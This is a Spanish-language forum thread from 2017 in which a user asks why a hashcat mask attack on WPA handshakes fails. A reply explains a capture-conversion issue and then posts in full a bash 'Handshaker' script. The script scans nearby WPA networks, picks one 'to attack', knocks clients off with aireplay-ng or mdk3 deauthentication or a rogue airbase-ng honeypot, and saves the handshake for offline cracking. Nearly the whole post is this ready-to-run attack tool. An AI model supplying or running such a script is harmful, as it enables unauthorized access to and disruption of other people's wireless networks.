22 de Julio de 2017, 05:32:04 pm
  • WPSdb - Base de Datos de Pines Online

Autor Tema: Hashcat-3.6.0 es un cuento Chino?  (Leído 128 veces)

Desconectado Saturla

  • Usuario
  • *
  • Mensajes: 1
  • Reputación: +0/-0
  • Usuario
  • awards Usuario Registrado
    • Awards
Hashcat-3.6.0 es un cuento Chino?
« en: 09 de Julio de 2017, 11:57:00 am »
Hola a todos:
Mi inquietud es la siguiente, tengo mas de una docena de crackeos con el maravilloso FiberCrunch e intentando ampliar mis conocimientos, decido probar el HashCat. Antes que nada decido probarlos con alguno de los mencionados crackeos, iniciando con los del tipo 004/014 + 7 dígitos, para lo cual aplico un comando con el formato: hashcat64.exe -a 3 -m 2500 WiFi0XX.hccapx 014?d?d?d?d?d?d?d?
Resultado: NINGUNO OBTIENE LA PASS.
Alguién podrá ilustrarme sobre el tema. Desde ya muchas gracias.
  • Antenas: Exterior 12dbi  y USB de 5dbi
  • Sistemas Operativos: XP-W7-Linux
  • Sistemas Operativos que utilizo para Auditar: Wifiway 3.4
  • Dispositivos Inalambricos: Alfa 2W

Desconectado user

  • Usuario
  • *
  • Mensajes: 342
  • Reputación: +16/-1
  • Agua que no as de beber, dejala correr
  • awards Usuario con más de 100 Posts! Usuario Registrado
    • Awards
Re:Hashcat-3.6.0 es un cuento Chino?
« Respuesta #1 en: 09 de Julio de 2017, 01:21:53 pm »
Hola a todos:
Mi inquietud es la siguiente, tengo mas de una docena de crackeos con el maravilloso FiberCrunch e intentando ampliar mis conocimientos, decido probar el HashCat. Antes que nada decido probarlos con alguno de los mencionados crackeos, iniciando con los del tipo 004/014 + 7 dígitos, para lo cual aplico un comando con el formato: hashcat64.exe -a 3 -m 2500 WiFi0XX.hccapx 014?d?d?d?d?d?d?d?
Resultado: NINGUNO OBTIENE LA PASS.
Alguién podrá ilustrarme sobre el tema. Desde ya muchas gracias.
Hola,
veo que en tu comando tenes un ? demas al final, calculo que se te paso aca no mas.
Después te cuento que en base a tu comentario intente correrlo con algun cap mio y la nueva version 3.6.0
La mayoria no le gustaban porque estaban capturados con handshaker.sh, este script utiliza wpaclean, que al parecer al cap2hccapx no le gusta.
Entonces procedí a capturar mi red solo con aircrack sin ningun script, lo converti con el cap2hccapx y le corri el hashcat y finalizo correctamente dandome la password.

Despues lei un poco acerca del handshaker y vi en otro foro que un muchacho removio el wpaclean del script para que las capturas sirvan con el nuevo hashcat.

lo dejo por si lo usas:
Código: [Seleccionar]
#!/bin/bash

# Modificacion por USUARIONUEO @ www.seguridadwireless.net
# Comento todo lo relacionado a matar procesos ya que para
# capturar un handshake , no es necesario detenerlos ademas
# al acabar no los restaura , todo el codigo es el original.

# 23/04/2017 , se comenta la accion de pasar el cap por
# wpaclean , ya que despues hashcat se queja (no recomiendan
# pasar los cap por wpaclean y demas tools de limpieza)
# el cap sera solo movido a la ruta de destino.


#################################################################
#                                                               #
# # -*- ENCODING: UTF-8 -*-                                     #
# Este programa es software libre. Puede redistribuirlo y/o     #
# modificar-lo bajo los términos de la Licencia Pública General #
# de GNU según es publicada por la Free Software Foundation,    #
# bien de la versión 3 de dicha Licencia o bien (según su       #
# elección) de cualquier versión posterior.                     #
#                                                               #
# Si usted hace alguna modificación en esta aplicación,         #
# deberá siempre mencionar al autor original de la misma.       #
#                                                               #
# Autor:Script creado por Coeman76                              #
#                                                               #
# Integra funciones del Brutus Hack WPA                         #
# Funcion Seleccion tarjeta by kdctv                            #
# Funcion Deteccion Mdk3 adaptada del Brutus Hack WPA           #
# Funcion deteccion root adaptada del Brutus Hack WPA           #
# Funcion Seleccion Red y Handshake Aireplay creadas por        #
# Goyfilms y adaptadas al script por Coeman76                   #
#                                                               #
# Un saludo                                                     #
#                                                               #
#################################################################

blanco="\033[1;37m"
magenta="\033[0;35m"
rojo="\033[1;31m"
verde="\033[1;32m"
amarillo="\033[1;33m"
azul="\033[1;34m"
#############################################detecta mdk3 #######################################################

DETECTMDK3(){                                                                       
which mdk3 &> /dev/null                                                           
if [ $? -ne 0 ]; then 
echo ""
echo -e $rojo " El programa mdk3 no esta Instalado"
echo ""
echo -e $amarillo " Puedes elegir 1 de estos 3 Ataques:"                       
echo ""
echo -e $azul
echo "1) Aireplay-ng"
echo ""
echo "2) Honeypot"
echo ""
echo "3) Honeypot + Aireplay-ng"
echo -e $amarillo""
read -ep " Escoge una opcion : " P                                                 
case $P in
1)                                                     
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
sleep 2
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE1
;;
2)                                   
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT2
;;
3)                                   
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT
;;
esac
else
echo ""
echo -e $verde"   MDK3 esta Correctamente Instalado" 
echo -e $magenta "══════════════════════════════════════════════════"
sleep 1
fi
}
########################################## detectar root ###########################################################
FUNCROOT(){
W=$(whoami)
if [ "$W" == "root" ]; then
sleep 0.5
else
echo ""
echo " Necesitas loguearte como root para continuar..."
echo ""
exit
fi
}
################################################ Seleccion y Ataque Honeypot ##############################################
HONEYPOT(){
echo -e ""$amarillo
echo -e " Elige el tipo de encriptacion para el Honeypot"
echo -e ""
echo -e $azul"   1) WPA-TKIP"
echo -e "   2) WPA-CCMP"
echo -e "   3) WPA2-TKIP"
echo -e "   4) WPA2-CCMP"
echo -e $verde ""
read -ep " Entrar numero opción : " A
case $A in
1)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -z 2 -a $bssid $intmon &
;;
2)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -z 4 -a $bssid $intmon &
;;
3)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -Z 2 -a $bssid $intmon &
;;
4)
xterm -e airbase-ng -c $CANAL -e $essid -W 1 -Z 4 -a $bssid $intmon &
;;
*)
echo -e $rojo" ERROR: opción no valida"
HONEYPOT   
;;
esac
}
ATAQUEHONEYPOT(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE1
}
ATAQUEHONEYPOT1(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE2
}
ATAQUEHONEYPOT2(){
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $verde "              Creando Honeypot..."
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $amarillo""
airmon-ng start $intrfz > /dev/null 2>&1
SNIFF1 &
CSV
HANDSHAKE3
}
################################################ Mdk3 ##############################################################
MDK3(){
xterm -e mdk3 $intmon d $bssid &
mdk3pid=$!
sleep 10 && kill $mdk3pid &>/dev/null
if [ ! -e /proc/$mdk3pid ]; then
sleep 2
fi
}
####################################################Seleccionar la tarjeta###########################################
SELECT(){

iwconfig --version | grep "Recommend" | awk '{print $1}' > ./redes/iw.txt
airmon-ng | sed '3d' | awk '{print $2}' | sed '/^$/d' > ./redes/id.txt
cont=1
for j in `cat ./redes/iw.txt`
do
      var=`nl ./redes/id.txt | grep $cont | awk '{print $2}'`
      echo $j"       "$var
      let cont=cont+1
done > ./redes/iwi.txt
declare -a tarj_disp
  for i in "tarj_disp";
    do
    count=1               
      if [ "$i" == "tarj_disp" ]; then
         while read -r line; do
           tarj_disp[${count}]="$line"
            count=$((count+1))
         done < <( cat ./redes/iwi.txt )
      fi
done

ntarj=$(echo ${#tarj_disp[@]})
if [ -z "${ntarj}" ];
  then
  echo -e ""$rojo" ERROR:"$verde" No se detectó ninguna tarjeta inalambrica"
  echo ""
  sleep 2
  exit
else
  echo ""
  echo -e ""$verde"  Se han detectado las siguientes interfaces :"
  echo ""
  echo -e $magenta" ════════════════════════════════════════════════════════════"
    for i in ${!tarj_disp[*]}; do
       echo -e $amarillo"          $i)        ${tarj_disp[${i}]}      " 
    done
    if [ $ntarj -ge 1 ]; then
     echo -e $magenta" ════════════════════════════════════════════════════════════"$azul""
     echo ""
     read -p " Selecciona una Interfaz: " opt
       while [[ $opt < 1 ]] || [[ $opt > $ntarj ]]; do
         echo ""
         echo -e $rojo" ERROR!"$verde"...Opcion Invalida"
         echo ""
         echo -e $magenta" ════════════════════════════════════════════════════════════"$azul""
         echo ""
       read -p " Selecciona una Interfaz: " opt
    done
   fi
   
intrfaz=$(echo ${tarj_disp[${opt}]})
intrfz=`echo $intrfaz | awk '{print $1}'`
fi
}
####################################################Iniciar la tarjeta###############################################
START(){
ifconfig $intrfz down > /dev/null 2>&1
ifconfig $intrfz up > /dev/null 2>&1
iwconfig $intrfz rate 1M > /dev/null 2>&1
}
#################################################Poner en modo monitor################################################
MONITORUP(){
airmon-ng start $intrfz > /dev/null 2>&1
ifconfig mon0 > /dev/null 2>&1
echo ""
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo -e $verde"           Activando "$amarillo""$intrfz""$verde" en modo monitor"
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo ""
sleep 2
if [ $? = 0 ]; then
intmon=mon0
else
intmon=$intrfz
fi
}
##################################################Buscar redes######################################################
SEARCH(){
echo -e $verde "  Iniciando escaneo de redes..."$rojo"Ctrl + C detiene el proceso "
echo -e $magenta" ════════════════════════════════════════════════════════════"
echo ""
sleep 2
xterm -e airodump-ng --encrypt WPA -w ./redes/Redes $intmon 
linap=`cat redes/Redes-01.csv | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'`
linap=`expr $linap - 1`
head -n $linap redes/Redes-01.csv &> redes/Redes.csv
tail -n +$linap redes/Redes-01.csv &> redes/clientes.csv
clear
lincsv=`wc -l redes/Redes.csv | awk '{print $1}'`
if [ $lincsv -le 3 ]; then
echo ""
echo -e $rojo
echo -e " No se encontró ninguna red...saliendo del script..."
echo ""
KILL
sleep 2
exit
fi
rm -rf redes/Redes.txt> /dev/null 2>&1
i=0
while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY; do
caracteres_mac=${#MAC}
if [ $caracteres_mac -ge 17 ]; then
i=$(($i+1))
if [[ $POWER -lt 0 ]]; then
if [[ $POWER -eq -1 ]]; then
POWER=0
else
POWER=`expr $POWER + 100`
fi
fi
POWER=`echo $POWER | awk '{gsub(/ /,""); print}'` 
ESSID=`expr substr "$ESSID" 2 $IDLENGTH`
if [ $CHANNEL -gt 13 ] || [ $CHANNEL -lt 1 ]; then
CHANNEL=0
else
CHANNEL=`echo $CHANNEL | awk '{gsub(/ /,""); print}'`
fi
if [ "$ESSID" = "" ] || [ "$CHANNEL" = "-1" ]; then
ESSID="(Red Oculta)"
fi
echo -e "$MAC,$CHANNEL,$POWER,$ESSID" >> redes/Redes.txt
fi
done < redes/Redes.csv
sort -t "," -d -k 4 "redes/Redes.txt" > "redes/redes_wifi.txt"
}
################################################seleccionar red#####################################################
SELECTWIFI(){
clear
echo
echo -e  $azul"  N         BSSID       CANAL   PWR      ESSID"
echo -e  $magenta"  ══   ═════════════════ ═════  ═════ ═════════════""$verde"
echo ""
i=0
while IFS=, read MAC CANAL POTENCIA ESSID; do
i=$(($i+1))
if [ $i -le 9 ]; then
ESPACIO1=" "
else
ESPACIO1=""
fi
if [[ $CANAL -le 9 ]]; then
ESPACIO2=" "
if [[ $CANAL -eq 0 ]]; then
CANAL="-"
fi
else
ESPACIO2=""
fi
if [[ "$POTENCIA" = "" ]]; then
POTENCIA=0
fi
if [[ $POTENCIA -le 9 ]]; then
ESPACIO4=" "
else
ESPACIO4=""
fi
CLIENTE=`cat redes/clientes.csv | grep $MAC`
if [ "$CLIENTE" != "" ]; then
CLIENTE="*"
ESPACIO5=""
else
ESPACIO5=" "
fi
nombres_ap[$i]=$ESSID
canales[$i]=$CANAL
macs[$i]=$MAC
echo -e " $ESPACIO1$i)"$blanco"$CLIENTE"$amarillo"  $ESPACIO5$MAC "$verde"  $ESPACIO2$CANAL  "$amarillo"  $ESPACIO4$POTENCIA%  "$verde" $ESSID "
done < "redes/redes_wifi.txt"
echo
if [ $i -eq 1 ]; then
select=1
else
echo -e $verde "("$blanco"*"$verde") Red con Clientes"$azul""
echo ""
read -p " Selecciona la red a atacar : " select
fi
while [[ $select -lt 1 ]] || [[ $select -gt $i ]]; do
echo ""
echo -e $rojo " ERROR!"$verde" Opcion Incorrecta"$azul""
echo ""
read -p " Selecciona la red a atacar : " select
done
essid=${nombres_ap[$select]}
CANAL=${canales[$select]}
bssid=${macs[$select]}
bssidseparado=`echo $bssid | awk '{gsub(/:/,"-"); print}'`
echo ""
if [ "$essid" = "(Red Oculta)" ]; then
echo -e $rojo ""
echo -e " ERROR!: has seleccionado una red oculta..."
echo -e $amarillo""
sleep 1
echo -e " Saliendo del Script..."
KILL
exit
fi
}
########################################Capturar Trafico##########################################################
SNIFF(){
xterm -e airodump-ng --bssid $bssid -c $CANAL,$CANAL -w "redes/$essid ($bssidseparado)" $intmon &
}
SNIFF1(){
xterm -e airodump-ng --bssid $bssid -c $CANAL,$CANAL -w "redes/$essid ($bssidseparado)" mon1 &
}
############################################Tamaño y calculo Captura################################################
CALCULANUM(){
NUM=`ls -1 redes/"$essid ($bssidseparado)"-*.cap | wc -l`
if [ $NUM -lt 10 ]; then
CERO="0"
else
CERO=""
fi
}
#############################################CSV##################################################################
CSV(){
counter=1
ls redes/"$essid ($bssidseparado)"-01.csv > /dev/null 2>&1
while [ ! $? -eq 0 ]; do
echo -e ""$azul".\c"
sleep 0.2
counter=$((counter+1))
if [ $counter -gt 15 ]; then
counter=1
fi
ls redes/"$essid ($bssidseparado)"-01.csv > /dev/null 2>&1
done
echo -e "$amarillo\n"
}
########################################### Forzar Handshake Aireplay ##############################################
HANDSHAKE1(){
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
intervalo=20
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r${TAB} Buscando clientes...\c"
CONT=1
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Desautenticando cliente "$amarillo"$hay... \033[K"
xterm -e aireplay-ng -R --ignore-negative-one -0 5 -a $bssid -c $hay $intmon
CONT=$((CONT+1))
done
CONT=$intervalo
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ $CONT -eq 1 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
else
if [ $CONT -lt 10 ]
then
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
else
echo -e $azul"\r${TAB} Reiniciando ataque en "$verde" $CONT...   $amarillo $hands  \c"$verde
fi
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
sleep 1
CONT=$((CONT-1))
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
# wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
############################################# Forzar Handshake MDK3 ##################################################
HANDSHAKE2(){
intervalo=20
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r${TAB} Buscando clientes...\c"
CONT=1
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Lanzando ataque MDK3 a "$azul"$essid... \033[K""$verde"
echo ""
sleep 1
MDK3
CONT=$((CONT+1))
done
CONT=$intervalo
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ $CONT -eq 1 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
else
if [ $CONT -lt 10 ]; then
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
else
echo -e $azul"\r${TAB} Reiniciando ataque en  "$verde"$CONT...   $amarillo  $hands \c"$verde
fi
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
sleep 1
CONT=$((CONT-1))
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
#wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
####################################### Handshake Honeypot ###########################################################
HANDSHAKE3(){
intervalo2=300
hay=""
airsnif=`ps -A | grep airodump-ng | grep -v grep`
while [ ! "$airsnif" = "" ]; do
CALCULANUM
varios=`cat redes/"$essid ($bssidseparado)"-01.csv | grep -v WPA | grep $bssid | awk -F ',' '{print $1}'| awk '{gsub(/ /,""); print}'`
cuantoshay=`echo $varios | wc -w`
if [ "$varios" = "" ]; then
CALCULANUM
echo -e $azul"\r Buscando clientes...\c"
while [ $CONT -le 25 ]; do
echo -e " \c"
sleep 0.05
CONT=$((CONT+1))
done
else
CONT=1
while [ $CONT -le $cuantoshay ]; do
hay=`echo $varios | awk '{print $'$CONT'}'`
clientemac=`echo -n $hay | cut -c-8`
echo -en $verde"\r Lanzando Honeypot... \033[K""$verde"
CONT=$((CONT+1))
done
CONT=$intervalo2
while [ $CONT -ge 1 ]; do
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
echo -e $amarillo
break
fi
done
fi
CALCULANUM
datas=`cat ./redes/"$essid ($bssidseparado)"-01.csv | grep "WPA" | awk '{print $11}' FS=',' | awk '{gsub(/ /,""); print}'`
if [[ $datas -ne 0 ]]; then
hands=`aircrack-ng redes/"$essid ($bssidseparado)"-01.cap | grep $bssid | tail --bytes 14`
fi
if [ "$hands" = "(1 handshake)" ]; then
clear
echo ""
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo -e $blanco"         ¡¡¡ "$verde"HANDSHAKE CONSEGUIDO"$blanco" !!!"
echo -e $magenta "══════════════════════════════════════════════════"
# Poceso comentado,ha hashcat no le gustan los cap pasados por wpaclean solo se moveran a la ruta.
#wpaclean "handshake/$essid ($bssidseparado).cap" "redes/$essid ($bssidseparado)-01.cap" > /dev/null 2>&1
mv -f "redes/$essid ($bssidseparado)-01.cap" "handshake/$essid ($bssidseparado).cap" > /dev/null 2>&1
KILL
ruta_handshake=`cd ./handshake ; readlink -f "$essid ($bssidseparado).cap"`
echo ""
echo ""
echo -e $amarillo " El Handshake se encuentra en la carpeta handshake  ;) "
echo ""
echo -e " La ruta del handshake es "$verde"$ruta_handshake"   
sleep 1
echo ""
echo -e $azul " Bye Bye..."
echo ""
break
fi
done
}
###################################################Desactivar el modo monitor########################################
MONSTOP(){
intmons=`iwconfig --version | grep "Recommend" | awk '{print $1}' | grep mon`
let cuantas=`echo $intmons | wc -w`
let CONT=1
while [ $CONT -le $cuantas ]; do
MON=`echo $intmons| awk '{print $'$CONT'}'`
airmon-ng stop $MON > /dev/null 2>&1
let CONT=$CONT+1
done
}
#################################################Matar los procesos###################################################
KILL(){
#pids=`ps -A | grep -e xterm -e ifconfig -e dhcpcd -e dhclient -e NetworkManager -e wpa_supplicant -e udhcpc`
#while [ "$pids" != "" ]; do
#killall -q xterm ifconfig dhcpcd dhclient dhclient3 NetworkManager wpa_supplicant udhcpc > /dev/null 2>&1
#pids=`ps -A | grep -e xterm -e ifconfig -e dhcpcd -e dhclient -e NetworkManager -e wpa_supplicant -e udhcpc`
#done
MONSTOP
rm -fr ./redes > /dev/null 2>&1
mkdir redes > /dev/null 2>&1
}
###################################### PROGRAMA HANDSHAKER ##########################################################
FUNCROOT
KILL
clear
echo ""
echo ""
echo -e $amarillo"╔═════════════════════════════════════════════╗"
echo -e $amarillo"║  "$azul" Bienvenido a Handshaker "$blanco"v1.1"$azul" by Coeman76  "$amarillo"║"
echo -e "╚═════════════════════════════════════════════╝"
sleep 3
clear
SELECT
START
MONITORUP
SEARCH
SELECTWIFI
echo ""
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
echo -e $amarillo" Escoge entre uno de los siguientes ataques"
echo ""
echo ""
echo -e $azul" 1) Aireplay-ng"
echo
echo " 2) MDK3"
echo
echo " 3) Honeypot"
echo
echo " 4) Honeypot + Aireplay-ng"
echo
echo " 5) Honeypot + MDK3"
echo ""
echo -e $amarillo""
read -p " Escoge una opcion : " OPC
echo ""
if [ "$OPC" = 1 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE1
elif [ "$OPC" = 2 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON MDK3"
echo -e $magenta "══════════════════════════════════════════════════"
DETECTMDK3
echo ""
echo -e $verde" Capturando Datos y Esperando Handshake...."
SNIFF &
CSV
HANDSHAKE2
elif [ "$OPC" = 3 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT2
elif [ "$OPC" = 4 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + AIREPLAY-NG"
echo -e $magenta "══════════════════════════════════════════════════"
HONEYPOT
ATAQUEHONEYPOT
elif [ "$OPC" = 5 ]; then
echo ""
echo -e $amarillo " Has escogido : "$azul"ATAQUE CON HONEYPOT + MDK3"
echo -e $magenta "══════════════════════════════════════════════════"
echo ""
DETECTMDK3
HONEYPOT
ATAQUEHONEYPOT1
fi
################################################## Fin #############################################################

Citar
Fuente:http://foro.seguridadwireless.net/colaboracion-y-desarrollo-de-nuestras-lives/hashcat-3-5-0-pruebas-y-comentarios/
« Última modificación: 09 de Julio de 2017, 01:23:05 pm por user »
  • Antenas: Antena 9dbi Omni Encore 2.4ghz en router TP-LINK con DD-WRT
  • Sistemas Operativos: Windows 7, WIfislax
  • Sistemas Operativos que utilizo para Auditar: WifiSlax 4.11.1 en vmware
  • Dispositivos Inalambricos: Usb Chino, TL-WN722N + antena 6 dbi , Ubiquiti Nanostation M2